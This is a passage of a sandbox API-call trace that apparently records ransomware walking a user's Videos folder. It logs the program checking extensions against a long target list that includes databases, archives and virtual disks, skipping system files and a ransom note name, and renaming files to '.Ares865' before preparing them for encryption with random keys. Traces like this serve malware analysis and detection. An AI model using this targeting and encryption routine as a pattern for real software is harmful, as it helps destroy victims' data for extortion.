[0091.940] lstrlenW (lpString="daschema") returned 8 [0091.940] lstrcmpiW (lpString1="hHi4.avi", lpString2="daschema") returned 1 [0091.940] lstrlenW (lpString="db-journal") returned 10 [0091.940] lstrcmpiW (lpString1="ErhHi4.avi", lpString2="db-journal") returned 1 [0091.940] lstrlenW (lpString="db-shm") returned 6 [0091.940] lstrcmpiW (lpString1="i4.avi", lpString2="db-shm") returned 1 [0091.940] lstrlenW (lpString="db-wal") returned 6 [0091.940] lstrcmpiW (lpString1="i4.avi", lpString2="db-wal") returned 1 [0091.940] lstrlenW (lpString="dbc") returned 3 [0091.940] lstrcmpiW (lpString1="avi", lpString2="dbc") returned -1 [0091.940] lstrlenW (lpString="dbs") returned 3 [0091.940] lstrcmpiW (lpString1="avi", lpString2="dbs") returned -1 [0091.940] lstrlenW (lpString="dbt") returned 3 [0091.940] lstrcmpiW (lpString1="avi", lpString2="dbt") returned -1 [0091.940] lstrlenW (lpString="dbv") returned 3 [0091.940] lstrcmpiW (lpString1="avi", lpString2="dbv") returned -1 [0091.940] lstrlenW (lpString="dbx") returned 3 [0091.940] lstrcmpiW (lpString1="avi", lpString2="dbx") returned -1 [0091.941] lstrlenW (lpString="dcb") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="dcb") returned -1 [0091.941] lstrlenW (lpString="dct") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="dct") returned -1 [0091.941] lstrlenW (lpString="dcx") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="dcx") returned -1 [0091.941] lstrlenW (lpString="ddl") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="ddl") returned -1 [0091.941] lstrlenW (lpString="dlis") returned 4 [0091.941] lstrcmpiW (lpString1=".avi", lpString2="dlis") returned -1 [0091.941] lstrlenW (lpString="dp1") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="dp1") returned -1 [0091.941] lstrlenW (lpString="dqy") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="dqy") returned -1 [0091.941] lstrlenW (lpString="dsk") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="dsk") returned -1 [0091.941] lstrlenW (lpString="dsn") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="dsn") returned -1 [0091.941] lstrlenW (lpString="dtsx") returned 4 [0091.941] lstrcmpiW (lpString1=".avi", lpString2="dtsx") returned -1 [0091.941] lstrlenW (lpString="dxl") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="dxl") returned -1 [0091.941] lstrlenW (lpString="eco") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="eco") returned -1 [0091.941] lstrlenW (lpString="ecx") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="ecx") returned -1 [0091.941] lstrlenW (lpString="edb") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="edb") returned -1 [0091.941] lstrlenW (lpString="epim") returned 4 [0091.941] lstrcmpiW (lpString1=".avi", lpString2="epim") returned -1 [0091.941] lstrlenW (lpString="fcd") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="fcd") returned -1 [0091.941] lstrlenW (lpString="fdb") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="fdb") returned -1 [0091.941] lstrlenW (lpString="fic") returned 3 [0091.941] lstrcmpiW (lpString1="avi", lpString2="fic") returned -1 [0091.941] lstrlenW (lpString="flexolibrary") returned 12 [0091.942] lstrcmpiW (lpString1="_KErhHi4.avi", lpString2="flexolibrary") returned -1 [0091.942] lstrlenW (lpString="fm5") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="fm5") returned -1 [0091.942] lstrlenW (lpString="fmp") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="fmp") returned -1 [0091.942] lstrlenW (lpString="fmp12") returned 5 [0091.942] lstrcmpiW (lpString1="4.avi", lpString2="fmp12") returned -1 [0091.942] lstrlenW (lpString="fmpsl") returned 5 [0091.942] lstrcmpiW (lpString1="4.avi", lpString2="fmpsl") returned -1 [0091.942] lstrlenW (lpString="fol") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="fol") returned -1 [0091.942] lstrlenW (lpString="fp3") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="fp3") returned -1 [0091.942] lstrlenW (lpString="fp4") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="fp4") returned -1 [0091.942] lstrlenW (lpString="fp5") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="fp5") returned -1 [0091.942] lstrlenW (lpString="fp7") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="fp7") returned -1 [0091.942] lstrlenW (lpString="fpt") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="fpt") returned -1 [0091.942] lstrlenW (lpString="frm") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="frm") returned -1 [0091.942] lstrlenW (lpString="gdb") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="gdb") returned -1 [0091.942] lstrlenW (lpString="gdb") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="gdb") returned -1 [0091.942] lstrlenW (lpString="grdb") returned 4 [0091.942] lstrcmpiW (lpString1=".avi", lpString2="grdb") returned -1 [0091.942] lstrlenW (lpString="gwi") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="gwi") returned -1 [0091.942] lstrlenW (lpString="hdb") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="hdb") returned -1 [0091.942] lstrlenW (lpString="his") returned 3 [0091.942] lstrcmpiW (lpString1="avi", lpString2="his") returned -1 [0091.942] lstrlenW (lpString="ib") returned 2 [0091.942] lstrcmpiW (lpString1="vi", lpString2="ib") returned 1 [0091.943] lstrlenW (lpString="idb") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="idb") returned -1 [0091.943] lstrlenW (lpString="ihx") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="ihx") returned -1 [0091.943] lstrlenW (lpString="itdb") returned 4 [0091.943] lstrcmpiW (lpString1=".avi", lpString2="itdb") returned -1 [0091.943] lstrlenW (lpString="itw") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="itw") returned -1 [0091.943] lstrlenW (lpString="jet") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="jet") returned -1 [0091.943] lstrlenW (lpString="jtx") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="jtx") returned -1 [0091.943] lstrlenW (lpString="kdb") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="kdb") returned -1 [0091.943] lstrlenW (lpString="kexi") returned 4 [0091.943] lstrcmpiW (lpString1=".avi", lpString2="kexi") returned -1 [0091.943] lstrlenW (lpString="kexic") returned 5 [0091.943] lstrcmpiW (lpString1="4.avi", lpString2="kexic") returned -1 [0091.943] lstrlenW (lpString="kexis") returned 5 [0091.943] lstrcmpiW (lpString1="4.avi", lpString2="kexis") returned -1 [0091.943] lstrlenW (lpString="lgc") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="lgc") returned -1 [0091.943] lstrlenW (lpString="lwx") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="lwx") returned -1 [0091.943] lstrlenW (lpString="maf") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="maf") returned -1 [0091.943] lstrlenW (lpString="maq") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="maq") returned -1 [0091.943] lstrlenW (lpString="mar") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="mar") returned -1 [0091.943] lstrlenW (lpString="marshal") returned 7 [0091.943] lstrcmpiW (lpString1="Hi4.avi", lpString2="marshal") returned -1 [0091.943] lstrlenW (lpString="mas") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="mas") returned -1 [0091.943] lstrlenW (lpString="mav") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="mav") returned -1 [0091.943] lstrlenW (lpString="maw") returned 3 [0091.943] lstrcmpiW (lpString1="avi", lpString2="maw") returned -1 [0091.944] lstrlenW (lpString="mdbhtml") returned 7 [0091.944] lstrcmpiW (lpString1="Hi4.avi", lpString2="mdbhtml") returned -1 [0091.944] lstrlenW (lpString="mdn") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="mdn") returned -1 [0091.944] lstrlenW (lpString="mdt") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="mdt") returned -1 [0091.944] lstrlenW (lpString="mfd") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="mfd") returned -1 [0091.944] lstrlenW (lpString="mpd") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="mpd") returned -1 [0091.944] lstrlenW (lpString="mrg") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="mrg") returned -1 [0091.944] lstrlenW (lpString="mud") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="mud") returned -1 [0091.944] lstrlenW (lpString="mwb") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="mwb") returned -1 [0091.944] lstrlenW (lpString="myd") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="myd") returned -1 [0091.944] lstrlenW (lpString="ndf") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="ndf") returned -1 [0091.944] lstrlenW (lpString="nnt") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="nnt") returned -1 [0091.944] lstrlenW (lpString="nrmlib") returned 6 [0091.944] lstrcmpiW (lpString1="i4.avi", lpString2="nrmlib") returned -1 [0091.944] lstrlenW (lpString="ns2") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="ns2") returned -1 [0091.944] lstrlenW (lpString="ns3") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="ns3") returned -1 [0091.944] lstrlenW (lpString="ns4") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="ns4") returned -1 [0091.944] lstrlenW (lpString="nsf") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="nsf") returned -1 [0091.944] lstrlenW (lpString="nv") returned 2 [0091.944] lstrcmpiW (lpString1="vi", lpString2="nv") returned 1 [0091.944] lstrlenW (lpString="nv2") returned 3 [0091.944] lstrcmpiW (lpString1="avi", lpString2="nv2") returned -1 [0091.944] lstrlenW (lpString="nwdb") returned 4 [0091.944] lstrcmpiW (lpString1=".avi", lpString2="nwdb") returned -1 [0091.945] lstrlenW (lpString="nyf") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="nyf") returned -1 [0091.945] lstrlenW (lpString="odb") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="odb") returned -1 [0091.945] lstrlenW (lpString="odb") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="odb") returned -1 [0091.945] lstrlenW (lpString="oqy") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="oqy") returned -1 [0091.945] lstrlenW (lpString="ora") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="ora") returned -1 [0091.945] lstrlenW (lpString="orx") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="orx") returned -1 [0091.945] lstrlenW (lpString="owc") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="owc") returned -1 [0091.945] lstrlenW (lpString="p96") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="p96") returned -1 [0091.945] lstrlenW (lpString="p97") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="p97") returned -1 [0091.945] lstrlenW (lpString="pan") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="pan") returned -1 [0091.945] lstrlenW (lpString="pdb") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="pdb") returned -1 [0091.945] lstrlenW (lpString="pdm") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="pdm") returned -1 [0091.945] lstrlenW (lpString="pnz") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="pnz") returned -1 [0091.945] lstrlenW (lpString="qry") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="qry") returned -1 [0091.945] lstrlenW (lpString="qvd") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="qvd") returned -1 [0091.945] lstrlenW (lpString="rbf") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="rbf") returned -1 [0091.945] lstrlenW (lpString="rctd") returned 4 [0091.945] lstrcmpiW (lpString1=".avi", lpString2="rctd") returned -1 [0091.945] lstrlenW (lpString="rod") returned 3 [0091.945] lstrcmpiW (lpString1="avi", lpString2="rod") returned -1 [0091.945] lstrlenW (lpString="rodx") returned 4 [0091.946] lstrcmpiW (lpString1=".avi", lpString2="rodx") returned -1 [0091.946] lstrlenW (lpString="rpd") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="rpd") returned -1 [0091.946] lstrlenW (lpString="rsd") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="rsd") returned -1 [0091.946] lstrlenW (lpString="sas7bdat") returned 8 [0091.946] lstrcmpiW (lpString1="hHi4.avi", lpString2="sas7bdat") returned -1 [0091.946] lstrlenW (lpString="sbf") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="sbf") returned -1 [0091.946] lstrlenW (lpString="scx") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="scx") returned -1 [0091.946] lstrlenW (lpString="sdb") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="sdb") returned -1 [0091.946] lstrlenW (lpString="sdc") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="sdc") returned -1 [0091.946] lstrlenW (lpString="sdf") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="sdf") returned -1 [0091.946] lstrlenW (lpString="sis") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="sis") returned -1 [0091.946] lstrlenW (lpString="spq") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="spq") returned -1 [0091.946] lstrlenW (lpString="te") returned 2 [0091.946] lstrcmpiW (lpString1="vi", lpString2="te") returned 1 [0091.946] lstrlenW (lpString="teacher") returned 7 [0091.946] lstrcmpiW (lpString1="Hi4.avi", lpString2="teacher") returned -1 [0091.946] lstrlenW (lpString="tmd") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="tmd") returned -1 [0091.946] lstrlenW (lpString="tps") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="tps") returned -1 [0091.946] lstrlenW (lpString="trc") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="trc") returned -1 [0091.946] lstrlenW (lpString="trc") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="trc") returned -1 [0091.946] lstrlenW (lpString="trm") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="trm") returned -1 [0091.946] lstrlenW (lpString="udb") returned 3 [0091.946] lstrcmpiW (lpString1="avi", lpString2="udb") returned -1 [0091.946] lstrlenW (lpString="udl") returned 3 [0091.947] lstrcmpiW (lpString1="avi", lpString2="udl") returned -1 [0091.947] lstrlenW (lpString="usr") returned 3 [0091.947] lstrcmpiW (lpString1="avi", lpString2="usr") returned -1 [0091.947] lstrlenW (lpString="v12") returned 3 [0091.947] lstrcmpiW (lpString1="avi", lpString2="v12") returned -1 [0091.947] lstrlenW (lpString="vis") returned 3 [0091.947] lstrcmpiW (lpString1="avi", lpString2="vis") returned -1 [0091.947] lstrlenW (lpString="vpd") returned 3 [0091.947] lstrcmpiW (lpString1="avi", lpString2="vpd") returned -1 [0091.947] lstrlenW (lpString="vvv") returned 3 [0091.947] lstrcmpiW (lpString1="avi", lpString2="vvv") returned -1 [0091.947] lstrlenW (lpString="wdb") returned 3 [0091.947] lstrcmpiW (lpString1="avi", lpString2="wdb") returned -1 [0091.947] lstrlenW (lpString="wmdb") returned 4 [0091.947] lstrcmpiW (lpString1=".avi", lpString2="wmdb") returned -1 [0091.947] lstrlenW (lpString="wrk") returned 3 [0091.947] lstrcmpiW (lpString1="avi", lpString2="wrk") returned -1 [0091.947] lstrlenW (lpString="xdb") returned 3 [0091.947] lstrcmpiW (lpString1="avi", lpString2="xdb") returned -1 [0091.947] lstrlenW (lpString="xld") returned 3 [0091.947] lstrcmpiW (lpString1="avi", lpString2="xld") returned -1 [0091.947] lstrlenW (lpString="xmlff") returned 5 [0091.947] lstrcmpiW (lpString1="4.avi", lpString2="xmlff") returned -1 [0091.947] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\lD6J_zIG4uGC_KErhHi4.avi.Ares865") returned 126 [0091.947] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\lD6J_zIG4uGC_KErhHi4.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\dsuw0nvop7yowlhk-m\\ld6j_zig4ugc_kerhhi4.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\lD6J_zIG4uGC_KErhHi4.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\dsuw0nvop7yowlhk-m\\ld6j_zig4ugc_kerhhi4.avi.ares865"), dwFlags=0x1) returned 1 [0091.948] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\lD6J_zIG4uGC_KErhHi4.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\dsuw0nvop7yowlhk-m\\ld6j_zig4ugc_kerhhi4.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.948] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52297) returned 1 [0091.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.948] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.949] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.949] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.950] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcf50, lpName=0x0) returned 0x15c [0091.950] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcf50) returned 0x190000 [0091.952] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.952] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.952] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0091.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0091.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0091.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0091.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0091.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0091.953] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0091.953] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0091.953] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.953] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0091.953] CloseHandle (hObject=0x15c) returned 1 [0091.953] CloseHandle (hObject=0x118) returned 1 [0091.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0091.955] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee08f1c0, ftCreationTime.dwHighDateTime=0x1d4d55f, ftLastAccessTime.dwLowDateTime=0x8d29e6c0, ftLastAccessTime.dwHighDateTime=0x1d4d451, ftLastWriteTime.dwLowDateTime=0x8d29e6c0, ftLastWriteTime.dwHighDateTime=0x1d4d451, nFileSizeHigh=0x0, nFileSizeLow=0x12a68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uQ9brPZ.avi", cAlternateFileName="")) returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="aoldtz.exe") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2=".") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="..") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="windows") returned -1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="bootmgr") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="temp") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="pagefile.sys") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="boot") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="ids.txt") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="ntuser.dat") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="perflogs") returned 1 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2="MSBuild") returned 1 [0091.955] lstrlenW (lpString="uQ9brPZ.avi") returned 11 [0091.955] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\lD6J_zIG4uGC_KErhHi4.avi") returned 118 [0091.955] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="uQ9brPZ.avi" | out: lpString1="uQ9brPZ.avi") returned="uQ9brPZ.avi" [0091.955] lstrlenW (lpString="uQ9brPZ.avi") returned 11 [0091.955] lstrlenW (lpString="Ares865") returned 7 [0091.955] lstrcmpiW (lpString1="rPZ.avi", lpString2="Ares865") returned 1 [0091.955] lstrlenW (lpString=".dll") returned 4 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2=".dll") returned 1 [0091.955] lstrlenW (lpString=".lnk") returned 4 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2=".lnk") returned 1 [0091.955] lstrlenW (lpString=".ini") returned 4 [0091.955] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2=".ini") returned 1 [0091.955] lstrlenW (lpString=".sys") returned 4 [0091.956] lstrcmpiW (lpString1="uQ9brPZ.avi", lpString2=".sys") returned 1 [0091.956] lstrlenW (lpString="uQ9brPZ.avi") returned 11 [0091.956] lstrlenW (lpString="bak") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="bak") returned -1 [0091.956] lstrlenW (lpString="ba_") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="ba_") returned -1 [0091.956] lstrlenW (lpString="dbb") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="dbb") returned -1 [0091.956] lstrlenW (lpString="vmdk") returned 4 [0091.956] lstrcmpiW (lpString1=".avi", lpString2="vmdk") returned -1 [0091.956] lstrlenW (lpString="rar") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="rar") returned -1 [0091.956] lstrlenW (lpString="zip") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="zip") returned -1 [0091.956] lstrlenW (lpString="tgz") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="tgz") returned -1 [0091.956] lstrlenW (lpString="vbox") returned 4 [0091.956] lstrcmpiW (lpString1=".avi", lpString2="vbox") returned -1 [0091.956] lstrlenW (lpString="vdi") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="vdi") returned -1 [0091.956] lstrlenW (lpString="vhd") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="vhd") returned -1 [0091.956] lstrlenW (lpString="vhdx") returned 4 [0091.956] lstrcmpiW (lpString1=".avi", lpString2="vhdx") returned -1 [0091.956] lstrlenW (lpString="avhd") returned 4 [0091.956] lstrcmpiW (lpString1=".avi", lpString2="avhd") returned -1 [0091.956] lstrlenW (lpString="db") returned 2 [0091.956] lstrcmpiW (lpString1="vi", lpString2="db") returned 1 [0091.956] lstrlenW (lpString="db2") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="db2") returned -1 [0091.956] lstrlenW (lpString="db3") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="db3") returned -1 [0091.956] lstrlenW (lpString="dbf") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="dbf") returned -1 [0091.956] lstrlenW (lpString="mdf") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="mdf") returned -1 [0091.956] lstrlenW (lpString="mdb") returned 3 [0091.956] lstrcmpiW (lpString1="avi", lpString2="mdb") returned -1 [0091.957] lstrlenW (lpString="sql") returned 3 [0091.957] lstrcmpiW (lpString1="avi", lpString2="sql") returned -1 [0091.957] lstrlenW (lpString="sqlite") returned 6 [0091.957] lstrcmpiW (lpString1="PZ.avi", lpString2="sqlite") returned -1 [0091.957] lstrlenW (lpString="sqlite3") returned 7 [0091.957] lstrcmpiW (lpString1="rPZ.avi", lpString2="sqlite3") returned -1 [0091.957] lstrlenW (lpString="sqlitedb") returned 8 [0091.957] lstrcmpiW (lpString1="brPZ.avi", lpString2="sqlitedb") returned -1 [0091.957] lstrlenW (lpString="xml") returned 3 [0091.957] lstrcmpiW (lpString1="avi", lpString2="xml") returned -1 [0091.957] lstrlenW (lpString="$er") returned 3 [0091.957] lstrcmpiW (lpString1="avi", lpString2="$er") returned 1 [0091.957] lstrlenW (lpString="4dd") returned 3 [0091.958] lstrcmpiW (lpString1="avi", lpString2="4dd") returned 1 [0091.958] lstrlenW (lpString="4dl") returned 3 [0091.958] lstrcmpiW (lpString1="avi", lpString2="4dl") returned 1 [0091.958] lstrlenW (lpString="^^^") returned 3 [0091.958] lstrcmpiW (lpString1="avi", lpString2="^^^") returned 1 [0091.958] lstrlenW (lpString="abs") returned 3 [0091.958] lstrcmpiW (lpString1="avi", lpString2="abs") returned 1 [0091.958] lstrlenW (lpString="abx") returned 3 [0091.958] lstrcmpiW (lpString1="avi", lpString2="abx") returned 1 [0091.958] lstrlenW (lpString="accdb") returned 5 [0091.958] lstrcmpiW (lpString1="Z.avi", lpString2="accdb") returned 1 [0091.958] lstrlenW (lpString="accdc") returned 5 [0091.958] lstrcmpiW (lpString1="Z.avi", lpString2="accdc") returned 1 [0091.958] lstrlenW (lpString="accde") returned 5 [0091.958] lstrcmpiW (lpString1="Z.avi", lpString2="accde") returned 1 [0091.958] lstrlenW (lpString="accdr") returned 5 [0091.958] lstrcmpiW (lpString1="Z.avi", lpString2="accdr") returned 1 [0091.958] lstrlenW (lpString="accdt") returned 5 